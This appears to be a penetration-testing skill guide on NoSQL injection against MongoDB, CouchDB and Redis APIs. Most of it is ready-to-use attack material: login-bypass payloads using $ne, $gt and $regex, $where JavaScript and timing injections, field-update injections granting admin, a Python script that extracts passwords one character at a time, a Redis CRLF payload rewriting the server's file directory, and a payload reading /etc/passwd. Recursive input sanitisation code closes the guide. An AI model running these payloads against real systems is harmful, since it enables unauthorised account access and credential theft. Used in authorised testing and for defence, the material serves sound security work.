Tests NoSQL database APIs for injection vulnerabilities targeting MongoDB, CouchDB, Redis, and other NoSQL backends. Use when target uses NoSQL database, when JSON input accepted, or when asked to "test MongoDB", "NoSQL injection", or "test document database".
Identify and exploit injection vulnerabilities in NoSQL database-backed APIs.
507f1f77bcf86cd799439011.find(), .aggregate() error messages
// Normal request
POST /api/login
{
"username": "admin",
"password": "password123"
}
// Injection - $ne (not equal)
{
"username": "admin",
"password": {"$ne": ""}
}
// Injection - $gt (greater than)
{
"username": "admin",
"password": {"$gt": ""}
}
// Injection - $regex
{
"username": "admin",
"password": {"$regex": ".*"}
}
VULNERABLE: Login succeeds without a valid password
SECURE: Error or rejected request
// Test if user exists using $regex
{
"username": {"$regex": "^a"},
"password": {"$ne": ""}
}
// Binary search for usernames
{
"username": {"$regex": "^admin"},
"password": {"$ne": ""}
}
// Using $where clause
{
"username": "admin",
"$where": "1==1"
}
// Sleep-based detection
{
"username": "admin",
"$where": "sleep(5000)"
}
// Data extraction via timing
{
"username": "admin",
"$where": "this.password.match(/^a/) ? sleep(5000) : 1"
}
// Character-by-character extraction
{
"username": "admin",
"password": {"$regex": "^p"}
}
// Response differs when match found
// Extract hex/special chars
{
"password": {"$regex": "^[a-f0-9]"}
}
// Bypass array checks
{
"items": {"$elemMatch": {"$gt": ""}}
}
// $in operator
{
"status": {"$in": ["active", "deleted", "admin"]}
}
// Inject additional fields
{
"username": "user",
"role": "admin",
"$set": {"isAdmin": true}
}
// MongoDB update injection
{
"username": "user",
"$set": {"password": "hacked"}
}
#!/usr/bin/env python3
"""MongoDB Blind Extraction via $regex"""
import requests
import string
# Endpoint the probes are sent to and the alphabet each probe round walks
# through (ASCII letters, digits and underscore — 63 candidates per position).
URL = "https://target.com/api/login"
CHARSET = "".join((string.ascii_letters, string.digits, "_"))
def extract_field(field_name, known_prefix=""):
    """Recover one document field a character at a time with anchored $regex probes.

    Starting from ``known_prefix``, every round posts one request per entry in
    ``CHARSET`` to ``URL`` with ``{"$regex": "^<prefix><char>"}`` as the value
    of ``field_name`` (username fixed to "admin"), and keeps the first character
    whose response contains "success" or returns status 200.  The first round
    in which no character is accepted ends the loop.

    Returns the prefix assembled so far (``known_prefix`` itself if nothing
    matched).  Each accepted character is also echoed with ``print``.

    From the defender's side this is a burst of login attempts — up to
    ``len(CHARSET)`` per recovered character — whose JSON bodies carry an
    operator key ("$regex") where a plain string is expected.  Request-schema
    validation (reject non-string credentials) stops it outright, and the
    per-account request volume is an obvious rate-limit / alerting signal.
    """
    recovered = known_prefix
    while True:
        for candidate in CHARSET:
            probe = {
                "username": "admin",
                field_name: {"$regex": f"^{recovered}{candidate}"},
            }
            resp = requests.post(URL, json=probe)
            if "success" in resp.text or resp.status_code == 200:
                recovered += candidate
                print(f"[+] Found: {recovered}")
                break
        else:
            # No candidate extended the prefix: nothing more to recover.
            return recovered
# Usage
# Module-level call: this runs on import/execution, issuing one request per
# candidate character until no character extends the prefix, then prints
# whatever was recovered (possibly an empty string).
password = extract_field("password")
print(f"[+] Extracted password: {password}")
// CouchDB view injection
GET /db/_design/docs/_view/all?startkey="a"&endkey="z"
// Mango query injection
POST /db/_find
{
"selector": {
"password": {"$regex": ".*"}
}
}
# SSRF to Redis
curl "https://target.com/api/cache?key=test\r\nCONFIG SET dir /var/www/html\r\n"
# Via newline injection
key=test%0d%0aSET%20pwned%20true
| Payload | Purpose | Database |
|---|---|---|
| {"$ne": ""} | Always true | MongoDB |
| {"$gt": ""} | Always true | MongoDB |
| {"$regex": ".*"} | Match all | MongoDB |
| {"$where": "1==1"} | JavaScript injection | MongoDB |
| {"$nin": []} | Empty array bypass | MongoDB |
| {"$exists": true} | Field exists | MongoDB |
Request:
POST /api/auth/login
Content-Type: application/json
{
"email": "[email protected]",
"password": {"$ne": null}
}
Response:
{
"token": "eyJhbGciOiJIUzI1NiIs...",
"user": {"role": "admin"}
}
Result: CRITICAL - Authentication bypassed using $ne operator
Attack sequence:
1. {"password": {"$regex": "^a"}} → 401
2. {"password": {"$regex": "^s"}} → 200 ✓
3. {"password": {"$regex": "^se"}} → 200 ✓
4. {"password": {"$regex": "^sec"}} → 200 ✓
...
Final: password = "secretPassword123"
Result: HIGH - Password extracted via blind regex injection
Request:
POST /api/users/search
{
"$where": "return (this.isAdmin && (function(){var fs=require('fs'); return fs.readFileSync('/etc/passwd')}()))"
}
Response:
MongoError: ReferenceError: require is not defined
Result: MEDIUM - JavaScript execution context confirmed, sandboxed
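// Reject MongoDB operators anywhere in the input, not only at the top level.
//
// The one-level check catches `{"$where": "1==1"}` but lets the login payloads
// shown above through, because `{"password": {"$ne": ""}}` nests the operator
// under an ordinary key. This version walks objects and arrays recursively and
// throws on the first key that starts with '$'. `typeof null === 'object'`, so
// null is handled explicitly rather than being passed to Object.keys (which
// throws a TypeError instead of the intended 'Invalid input').
//
// Returns the input unchanged when it is clean; throws Error('Invalid input')
// otherwise. Treat this as defense in depth: enforcing the expected type or
// validating the request body against a schema is the primary control.
function sanitizeInput(input) {
  if (input === null || typeof input !== 'object') {
    // Primitives (string, number, boolean, undefined) cannot carry an operator key.
    return input;
  }
  if (Array.isArray(input)) {
    // Array elements may themselves be operator objects, e.g. [{"$gt": ""}].
    for (const element of input) {
      sanitizeInput(element);
    }
    return input;
  }
  for (const key of Object.keys(input)) {
    if (key.startsWith('$')) {
      throw new Error('Invalid input');
    }
    // Recurse so an operator hidden under a normal field name is rejected too.
    sanitizeInput(input[key]);
  }
  return input;
}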
// Instead of:
// Passing the raw body value through lets a JSON object such as {"$ne": ""}
// reach the driver as a query operator.
db.users.find({username: req.body.username})
// Use:
// String() coerces the value to a primitive: an injected object becomes the
// literal "[object Object]" and can no longer act as an operator. A stricter
// check (reject anything that is not already a string) avoids silently
// accepting arrays or numbers as usernames.
const username = String(req.body.username);
db.users.find({username: username})
// MongoDB config